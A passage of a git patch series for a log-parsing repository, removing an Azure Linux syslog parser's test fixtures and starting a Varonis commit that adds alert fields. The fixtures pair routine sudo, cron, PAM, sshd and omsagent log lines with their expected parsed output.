-          process.executable: "{{ grok_crond.result.process_executable }}"
-        name: set
-  sudo:
-    actions:
-      - set:
-          action.name: "{{ grok_sudo.result.action_name }}"
-        name: set
-      - set:
-          user.name: "{{ grok_sudo.result.user_name }}"
-        filter: "{{ grok_sudo.result.user_name != None and grok_sudo.result.user_name != null }}"
-        name: set
-      - set:
-          action.type: "{{ grok_sudo.result.sudo_observation }}"
-        filter: "{{ grok_sudo.result.sudo_observation != null}}"
-        name: set
-      - dictionary:
-          session closed: close
-          session opened: open
-        mapping:
-          action.type: action.type
-        filter: "{{ grok_sudo.result.sudo_observation != null}}"
-        name: translate
-      - set:
-          action.type: open
-        filter: '{{ grok_sudo.result.action_name == "sudo:auth" }}'
-        name: set
-  omsagent2:
-    actions:
-      - set:
-          user.name: "{{ omsagent.result.USER}}"
-          process.command_line: '{{ [grok2_omsagent.result.process_executable, grok2_omsagent.result.process_args]|select|join(" ") }}'
-          process.executable: "{{ grok2_omsagent.result.process_executable }}"
-          process.working_directory: "{{ omsagent.result.PWD }}"
-        name: set
-  action-outcome:
-    actions:
-      - set:
-          action.outcome: "{{json_event.message.level}}"
-        name: set
-      - fallback: success
-        dictionary:
-          crit: failure
-          critical: failure
-          err: failure
-          error: failure
-        mapping:
-          action.outcome: action.outcome
-        name: translate
diff --git a/Azure/azure-linux/tests/auth_conversation_failed.json b/Azure/azure-linux/tests/auth_conversation_failed.json
deleted file mode 100644
index 5a761c66d..000000000
--- a/Azure/azure-linux/tests/auth_conversation_failed.json
+++ /dev/null
@@ -1,28 +0,0 @@
-{
-  "input": {
-    "message": "{ \"time\" : \"2019-07-02T13:45:50.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"err\",\"EventTime\" : \"2019-07-02T13:45:50+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"pam_unix(sudo:auth): conversation failed\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-07-02T13:45:50Z\"},\"category\" : \"authpriv\",\"level\" : \"err\",\"operationName\" : \"LinuxSyslogEvent\"}"
-  },
-  "expected": {
-    "message": "{ \"time\" : \"2019-07-02T13:45:50.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"err\",\"EventTime\" : \"2019-07-02T13:45:50+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"pam_unix(sudo:auth): conversation failed\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-07-02T13:45:50Z\"},\"category\" : \"authpriv\",\"level\" : \"err\",\"operationName\" : \"LinuxSyslogEvent\"}",
-    "event": {
-      "outcome": "failure"
-    },
-    "@timestamp": "2019-07-02T13:45:50Z",
-    "action": {
-      "name": "sudo:auth",
-      "outcome": "failure",
-      "type": "open"
-    },
-    "azure_linux": {
-      "message": "pam_unix(sudo:auth): conversation failed"
-    },
-    "log": {
-      "hostname": "LinuxRedhatDesktop",
-      "level": "error"
-    },
-    "os": {
-      "family": "linux",
-      "platform": "linux"
-    }
-  }
-}
\ No newline at end of file
diff --git a/Azure/azure-linux/tests/auth_no_identity.json b/Azure/azure-linux/tests/auth_no_identity.json
deleted file mode 100644
index 1da5be28d..000000000
--- a/Azure/azure-linux/tests/auth_no_identity.json
+++ /dev/null
@@ -1,36 +0,0 @@
-{
-  "input": {
-    "message": "{ \"time\" : \"2019-07-02T13:46:32.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"crit\",\"EventTime\" : \"2019-07-02T13:46:32+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"pam_unix(sudo:auth): auth could not identify password for [omsagent]\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-07-02T13:46:32Z\"},\"category\" : \"authpriv\",\"level\" : \"crit\",\"operationName\" : \"LinuxSyslogEvent\"}"
-  },
-  "expected": {
-    "message": "{ \"time\" : \"2019-07-02T13:46:32.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"crit\",\"EventTime\" : \"2019-07-02T13:46:32+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"pam_unix(sudo:auth): auth could not identify password for [omsagent]\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-07-02T13:46:32Z\"},\"category\" : \"authpriv\",\"level\" : \"crit\",\"operationName\" : \"LinuxSyslogEvent\"}",
-    "event": {
-      "outcome": "failure"
-    },
-    "@timestamp": "2019-07-02T13:46:32Z",
-    "action": {
-      "name": "sudo:auth",
-      "outcome": "failure",
-      "type": "open"
-    },
-    "azure_linux": {
-      "message": "pam_unix(sudo:auth): auth could not identify password for [omsagent]"
-    },
-    "log": {
-      "hostname": "LinuxRedhatDesktop",
-      "level": "critical"
-    },
-    "os": {
-      "family": "linux",
-      "platform": "linux"
-    },
-    "related": {
-      "user": [
-        "omsagent"
-      ]
-    },
-    "user": {
-      "name": "omsagent"
-    }
-  }
-}
\ No newline at end of file
diff --git a/Azure/azure-linux/tests/cron_command1.json b/Azure/azure-linux/tests/cron_command1.json
deleted file mode 100644
index eef0c8095..000000000
--- a/Azure/azure-linux/tests/cron_command1.json
+++ /dev/null
@@ -1,35 +0,0 @@
-{
-  "input": {
-    "message": "{ \"time\" : \"2019-06-27T14:50:01.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"CROND\",\"pid\" : \"21188\",\"Ignore\" : \"syslog\",\"Facility\" : \"cron\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:50:01+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"(root) CMD (/usr/lib64/sa/sa1 1 1)\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:50:01Z\"},\"category\" : \"cron\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}"
-  },
-  "expected": {
-    "message": "{ \"time\" : \"2019-06-27T14:50:01.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"CROND\",\"pid\" : \"21188\",\"Ignore\" : \"syslog\",\"Facility\" : \"cron\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:50:01+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"(root) CMD (/usr/lib64/sa/sa1 1 1)\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:50:01Z\"},\"category\" : \"cron\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}",
-    "@timestamp": "2019-06-27T14:50:01Z",
-    "azure_linux": {
-      "message": "(root) CMD (/usr/lib64/sa/sa1 1 1)"
-    },
-    "log": {
-      "hostname": "LinuxRedhatDesktop",
-      "level": "info"
-    },
-    "os": {
-      "family": "linux",
-      "platform": "linux"
-    },
-    "process": {
-      "command_line": "/usr/lib64/sa/sa1 1 1",
-      "executable": "/usr/lib64/sa/sa1",
-      "parent": {
-        "pid": 21188
-      }
-    },
-    "related": {
-      "user": [
-        "root"
-      ]
-    },
-    "user": {
-      "name": "root"
-    }
-  }
-}
\ No newline at end of file
diff --git a/Azure/azure-linux/tests/cron_command2.json b/Azure/azure-linux/tests/cron_command2.json
deleted file mode 100644
index b7cc4940a..000000000
--- a/Azure/azure-linux/tests/cron_command2.json
+++ /dev/null
@@ -1,34 +0,0 @@
-{
-  "input": {
-    "message": "{ \"time\" : \"2019-06-27T14:29:01.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"CROND\",\"pid\" : \"16373\",\"Ignore\" : \"syslog\",\"Facility\" : \"cron\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:29:01+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"(root) CMD ([ -f /etc/krb5.keytab ] && [ \\\\( ! -f /etc/opt/omi/creds/omi.keytab \\\\) -o \\\\( /etc/krb5.keytab -nt /etc/opt/omi/creds/omi.keytab \\\\) ] && /opt/omi/bin/support/ktstrip /etc/krb5.keytab /etc/opt/omi/creds/omi.keytab >/dev/null 2>&1 || true)\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:29:01Z\"},\"category\" : \"cron\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}"
-  },
-  "expected": {
-    "message": "{ \"time\" : \"2019-06-27T14:29:01.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"CROND\",\"pid\" : \"16373\",\"Ignore\" : \"syslog\",\"Facility\" : \"cron\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:29:01+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"(root) CMD ([ -f /etc/krb5.keytab ] && [ \\\\( ! -f /etc/opt/omi/creds/omi.keytab \\\\) -o \\\\( /etc/krb5.keytab -nt /etc/opt/omi/creds/omi.keytab \\\\) ] && /opt/omi/bin/support/ktstrip /etc/krb5.keytab /etc/opt/omi/creds/omi.keytab >/dev/null 2>&1 || true)\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:29:01Z\"},\"category\" : \"cron\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}",
-    "@timestamp": "2019-06-27T14:29:01Z",
-    "azure_linux": {
-      "message": "(root) CMD ([ -f /etc/krb5.keytab ] && [ \\( ! -f /etc/opt/omi/creds/omi.keytab \\) -o \\( /etc/krb5.keytab -nt /etc/opt/omi/creds/omi.keytab \\) ] && /opt/omi/bin/support/ktstrip /etc/krb5.keytab /etc/opt/omi/creds/omi.keytab >/dev/null 2>&1 || true)"
-    },
-    "log": {
-      "hostname": "LinuxRedhatDesktop",
-      "level": "info"
-    },
-    "os": {
-      "family": "linux",
-      "platform": "linux"
-    },
-    "process": {
-      "command_line": "[ -f /etc/krb5.keytab ] && [ \\( ! -f /etc/opt/omi/creds/omi.keytab \\) -o \\( /etc/krb5.keytab -nt /etc/opt/omi/creds/omi.keytab \\) ] && /opt/omi/bin/support/ktstrip /etc/krb5.keytab /etc/opt/omi/creds/omi.keytab >/dev/null 2>&1 || true",
-      "parent": {
-        "pid": 16373
-      }
-    },
-    "related": {
-      "user": [
-        "root"
-      ]
-    },
-    "user": {
-      "name": "root"
-    }
-  }
-}
\ No newline at end of file
diff --git a/Azure/azure-linux/tests/disconnected.json b/Azure/azure-linux/tests/disconnected.json
deleted file mode 100644
index a845afb3b..000000000
--- a/Azure/azure-linux/tests/disconnected.json
+++ /dev/null
@@ -1,33 +0,0 @@
-{
-  "input": {
-    "message": "{ \"time\" : \"2019-06-27T14:50:51.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sshd\",\"pid\" : \"14020\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:50:51+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"Received disconnect from 185.122.161.248 port 39070:11: disconnected by user\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:50:51Z\"},\"category\" : \"authpriv\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}"
-  },
-  "expected": {
-    "message": "{ \"time\" : \"2019-06-27T14:50:51.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sshd\",\"pid\" : \"14020\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:50:51+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"Received disconnect from 185.122.161.248 port 39070:11: disconnected by user\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:50:51Z\"},\"category\" : \"authpriv\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}",
-    "@timestamp": "2019-06-27T14:50:51Z",
-    "azure_linux": {
-      "message": "Received disconnect from 185.122.161.248 port 39070:11: disconnected by user"
-    },
-    "log": {
-      "hostname": "LinuxRedhatDesktop",
-      "level": "info"
-    },
-    "os": {
-      "family": "linux",
-      "platform": "linux"
-    },
-    "process": {
-      "pid": 14020
-    },
-    "related": {
-      "ip": [
-        "185.122.161.248"
-      ]
-    },
-    "source": {
-      "address": "185.122.161.248",
-      "ip": "185.122.161.248",
-      "port": 39070
-    }
-  }
-}
\ No newline at end of file
diff --git a/Azure/azure-linux/tests/omsagent_command.json b/Azure/azure-linux/tests/omsagent_command.json
deleted file mode 100644
index 9b96a06aa..000000000
--- a/Azure/azure-linux/tests/omsagent_command.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
-  "input": {
-    "message": "{ \"time\" : \"2019-06-27T14:48:18.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"notice\",\"EventTime\" : \"2019-06-27T14:48:18+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"omsagent : TTY=unknown ; PWD=/opt/microsoft/omsconfig/Scripts/2.6x-2.7x ; USER=root ; COMMAND=/opt/microsoft/omsconfig/Scripts/OMSYumUpdates.sh\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:48:18Z\"},\"category\" : \"authpriv\",\"level\" : \"notice\",\"operationName\" : \"LinuxSyslogEvent\"}"
-  },
-  "expected": {
-    "message": "{ \"time\" : \"2019-06-27T14:48:18.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"notice\",\"EventTime\" : \"2019-06-27T14:48:18+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"omsagent : TTY=unknown ; PWD=/opt/microsoft/omsconfig/Scripts/2.6x-2.7x ; USER=root ; COMMAND=/opt/microsoft/omsconfig/Scripts/OMSYumUpdates.sh\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:48:18Z\"},\"category\" : \"authpriv\",\"level\" : \"notice\",\"operationName\" : \"LinuxSyslogEvent\"}",
-    "event": {
-      "outcome": "success"
-    },
-    "@timestamp": "2019-06-27T14:48:18Z",
-    "action": {
-      "outcome": "success"
-    },
-    "azure_linux": {
-      "message": "omsagent : TTY=unknown ; PWD=/opt/microsoft/omsconfig/Scripts/2.6x-2.7x ; USER=root ; COMMAND=/opt/microsoft/omsconfig/Scripts/OMSYumUpdates.sh"
-    },
-    "log": {
-      "hostname": "LinuxRedhatDesktop",
-      "level": "info"
-    },
-    "os": {
-      "family": "linux",
-      "platform": "linux"
-    },
-    "process": {
-      "command_line": "/opt/microsoft/omsconfig/Scripts/OMSYumUpdates.sh",
-      "executable": "/opt/microsoft/omsconfig/Scripts/OMSYumUpdates.sh",
-      "working_directory": "/opt/microsoft/omsconfig/Scripts/2.6x-2.7x"
-    },
-    "related": {
-      "user": [
-        "root"
-      ]
-    },
-    "user": {
-      "name": "root"
-    }
-  }
-}
\ No newline at end of file
diff --git a/Azure/azure-linux/tests/omsagent_command2.json b/Azure/azure-linux/tests/omsagent_command2.json
deleted file mode 100644
index 8839131bd..000000000
--- a/Azure/azure-linux/tests/omsagent_command2.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
-  "input": {
-    "message": "{ \"time\" : \"2019-07-02T13:46:15.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"notice\",\"EventTime\" : \"2019-07-02T13:46:15+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"omsagent : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/test -r /var/lib/docker/containers/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16-json.log\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-07-02T13:46:15Z\"},\"category\" : \"authpriv\",\"level\" : \"notice\",\"operationName\" : \"LinuxSyslogEvent\"}"
-  },
-  "expected": {
-    "message": "{ \"time\" : \"2019-07-02T13:46:15.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"notice\",\"EventTime\" : \"2019-07-02T13:46:15+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"omsagent : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/test -r /var/lib/docker/containers/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16-json.log\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-07-02T13:46:15Z\"},\"category\" : \"authpriv\",\"level\" : \"notice\",\"operationName\" : \"LinuxSyslogEvent\"}",
-    "event": {
-      "outcome": "success"
-    },
-    "@timestamp": "2019-07-02T13:46:15Z",
-    "action": {
-      "outcome": "success"
-    },
-    "azure_linux": {
-      "message": "omsagent : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/test -r /var/lib/docker/containers/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16-json.log"
-    },
-    "log": {
-      "hostname": "LinuxRedhatDesktop",
-      "level": "info"
-    },
-    "os": {
-      "family": "linux",
-      "platform": "linux"
-    },
-    "process": {
-      "command_line": "/bin/test -r /var/lib/docker/containers/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16-json.log",
-      "executable": "/bin/test",
-      "working_directory": "/"
-    },
-    "related": {
-      "user": [
-        "root"
-      ]
-    },
-    "user": {
-      "name": "root"
-    }
-  }
-}
\ No newline at end of file
diff --git a/Azure/azure-linux/tests/session_closed.json b/Azure/azure-linux/tests/session_closed.json
deleted file mode 100644
index 824820fff..000000000
--- a/Azure/azure-linux/tests/session_closed.json
+++ /dev/null
@@ -1,36 +0,0 @@
-{
-  "input": {
-    "message": "{ \"time\" : \"2019-06-27T14:48:28.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:48:28+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"pam_unix(sudo:session): session closed for user root\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:48:28Z\"},\"category\" : \"authpriv\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}"
-  },
-  "expected": {
-    "message": "{ \"time\" : \"2019-06-27T14:48:28.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:48:28+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"pam_unix(sudo:session): session closed for user root\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:48:28Z\"},\"category\" : \"authpriv\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}",
-    "event": {
-      "outcome": "success"
-    },
-    "@timestamp": "2019-06-27T14:48:28Z",
-    "action": {
-      "name": "sudo:session",
-      "outcome": "success",
-      "type": "close"
-    },
-    "azure_linux": {
-      "message": "pam_unix(sudo:session): session closed for user root"
-    },
-    "log": {
-      "hostname": "LinuxRedhatDesktop",
-      "level": "info"
-    },
-    "os": {
-      "family": "linux",
-      "platform": "linux"
-    },
-    "related": {
-      "user": [
-        "root"
-      ]
-    },
-    "user": {
-      "name": "root"
-    }
-  }
-}
\ No newline at end of file
diff --git a/Azure/azure-linux/tests/session_opened.json b/Azure/azure-linux/tests/session_opened.json
deleted file mode 100644
index 217cca4c3..000000000
--- a/Azure/azure-linux/tests/session_opened.json
+++ /dev/null
@@ -1,36 +0,0 @@
-{
-  "input": {
-    "message": "{ \"time\" : \"2019-06-27T14:48:28.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:48:28+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"pam_unix(sudo:session): session opened for user root by (uid=0)\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:48:28Z\"},\"category\" : \"authpriv\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}"
-  },
-  "expected": {
-    "message": "{ \"time\" : \"2019-06-27T14:48:28.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:48:28+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"pam_unix(sudo:session): session opened for user root by (uid=0)\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:48:28Z\"},\"category\" : \"authpriv\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}",
-    "event": {
-      "outcome": "success"
-    },
-    "@timestamp": "2019-06-27T14:48:28Z",
-    "action": {
-      "name": "sudo:session",
-      "outcome": "success",
-      "type": "open"
-    },
-    "azure_linux": {
-      "message": "pam_unix(sudo:session): session opened for user root by (uid=0)"
-    },
-    "log": {
-      "hostname": "LinuxRedhatDesktop",
-      "level": "info"
-    },
-    "os": {
-      "family": "linux",
-      "platform": "linux"
-    },
-    "related": {
-      "user": [
-        "root"
-      ]
-    },
-    "user": {
-      "name": "root"
-    }
-  }
-}
\ No newline at end of file
diff --git a/Azure/azure-linux/tests/systemd_session.json b/Azure/azure-linux/tests/systemd_session.json
deleted file mode 100644
index b84c4700d..000000000
--- a/Azure/azure-linux/tests/systemd_session.json
+++ /dev/null
@@ -1,36 +0,0 @@
-{
-  "input": {
-    "message": "{ \"time\" : \"2019-07-02T14:15:01.0000000Z\",\"resourceId\": \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"systemd\",\"Ignore\" : \"syslog\",\"Facility\" : \"daemon\",\"Severity\" : \"info\",\"EventTime\" : \"2019-07-02T14:15:01+0000\",\"SendingHost\": \"localhost\",\"Msg\" : \"Started Session 13124 of user omsagent.\",\"hostname\": \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-07-02T14:15:01Z\"},\"category\" : \"daemon\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}"
-  },
-  "expected": {
-    "message": "{ \"time\" : \"2019-07-02T14:15:01.0000000Z\",\"resourceId\": \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"systemd\",\"Ignore\" : \"syslog\",\"Facility\" : \"daemon\",\"Severity\" : \"info\",\"EventTime\" : \"2019-07-02T14:15:01+0000\",\"SendingHost\": \"localhost\",\"Msg\" : \"Started Session 13124 of user omsagent.\",\"hostname\": \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-07-02T14:15:01Z\"},\"category\" : \"daemon\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}",
-    "event": {
-      "outcome": "success"
-    },
-    "@timestamp": "2019-07-02T14:15:01Z",
-    "action": {
-      "name": "systemd:session",
-      "outcome": "success",
-      "type": "open"
-    },
-    "azure_linux": {
-      "message": "Started Session 13124 of user omsagent."
-    },
-    "log": {
-      "hostname": "LinuxRedhatDesktop",
-      "level": "info"
-    },
-    "os": {
-      "family": "linux",
-      "platform": "linux"
-    },
-    "related": {
-      "user": [
-        "omsagent"
-      ]
-    },
-    "user": {
-      "name": "omsagent"
-    }
-  }
-}
\ No newline at end of file

From 189e914f5e7eec43a1f89f1f1342dbad25b17cad Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 17 Oct 2024 11:15:17 +0200
Subject: [PATCH 160/317] fix/Varonis : Addition of new fields to improve
 detection

---
 .../varonis-data-security/_meta/fields.yml    | 15 ++++
 .../varonis-data-security/ingest/parser.yml   | 28 ++++++-
 .../tests/test_intrusion.json                 | 74 +++++++++++++++++++
 .../tests/test_network_alert.json             |  2 +-
 4 files changed, 115 insertions(+), 4 deletions(-)
 create mode 100644 Varonis/varonis-data-security/tests/test_intrusion.json

diff --git a/Varonis/varonis-data-security/_meta/fields.yml b/Varonis/varonis-data-security/_meta/fields.yml
index a01ff08c2..3711ca72c 100644
--- a/Varonis/varonis-data-security/_meta/fields.yml
+++ b/Varonis/varonis-data-security/_meta/fields.yml
@@ -1,3 +1,13 @@
+varonis.datalert.description:
+  description: The description of the triggered alert.
+  name: varonis.datalert.description
+  type: keyword
+
+varonis.datalert.destination.device:
+  description: The destination device name.
+  name: varonis.datalert.destination.device
+  type: keyword
+
 varonis.datalert.file.old_permission:
   description: The permissions before the change. Data is not collected for all event
     types.
@@ -30,3 +40,8 @@ varonis.datalert.outcome:
   description: Whether the event which triggered the alert succeeded or failed.
   name: varonis.datalert.outcome
   type: keyword
+
+varonis.datalert.rule.storyline:
+  description: The rule storyline of the triggered alert.
+  name: varonis.datalert.rule.storyline
+  type: keyword
diff --git a/Varonis/varonis-data-security/ingest/parser.yml b/Varonis/varonis-data-security/ingest/parser.yml
index 58cbbc6af..c66b8b4c2 100644
--- a/Varonis/varonis-data-security/ingest/parser.yml
+++ b/Varonis/varonis-data-security/ingest/parser.yml
